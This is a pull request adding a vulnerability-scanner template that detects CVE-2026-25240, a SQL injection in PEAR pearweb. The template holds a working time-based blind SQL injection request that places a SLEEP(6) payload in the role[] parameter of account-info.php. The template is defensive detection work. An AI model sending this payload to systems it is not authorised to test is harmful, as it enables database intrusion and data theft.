### PR TITLE
Add CVE-2026-25240 - PEAR pearweb SQLi in user maintains

### DIFF
--- a/http/cves/2026/CVE-2026-25240.yaml
+++ b/http/cves/2026/CVE-2026-25240.yaml
@@ -1,0 +1,44 @@
+id: CVE-2026-25240
+
+info:
+  name: PEAR pearweb < 1.33.0 - SQL Injection in user::maintains()
+  author: bswearingen
+  severity: critical
+  description: |
+    PEAR is a framework and distribution system for reusable PHP components. Prior to version 1.33.0, a SQL injection vulnerability can occur in user::maintains() when role filters are provided as an array and interpolated into an IN (...) clause. This issue has been patched in version 1.33.0.
+  impact: |
+    An attacker can inject arbitrary SQL through role filter parameters, potentially extracting sensitive data or modifying database contents.
+  remediation: |
+    Upgrade PEAR pearweb to version 1.33.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25240
+    - https://github.com/pear/pearweb
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-25240
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    vendor: pear
+    product: pearweb
+  tags: cve,cve2026,pear,pearweb,sqli
+
+http:
+  - raw:
+      - |
+        GET /account-info.php?handle=test&role[]=lead%27)%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(6)))a)--%20- HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+
+      - type: status
+        status:
+          - 200
+          - 302
+          - 500
+        condition: or


### PR DESCRIPTION
### Template Overview

This template detects CVE-2026-25240, a SQL injection vulnerability in the `user::maintains()` method of PEAR pearweb.

### Vulnerability Details

**Product:** PEAR pearweb
**Affected Versions:** < 1.33.0
**Severity:** Critical (CVSS 9.8)
**CWE:** CWE-89 (SQL Injection)

When role filters are provided as an array to the `user::maintains()` method, the values are interpolated directly into an `IN (...)` clause without proper parameterization. This allows an attacker to inject arbitrary SQL by manipulating the role filter values in requests to user account pages.

### Detection Method

Time-based blind SQL injection via the account info endpoint. A `SLEEP(6)` payload is injected through the role array parameter and the response delay is measured.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2026-25240
- https://github.com/pear/pearweb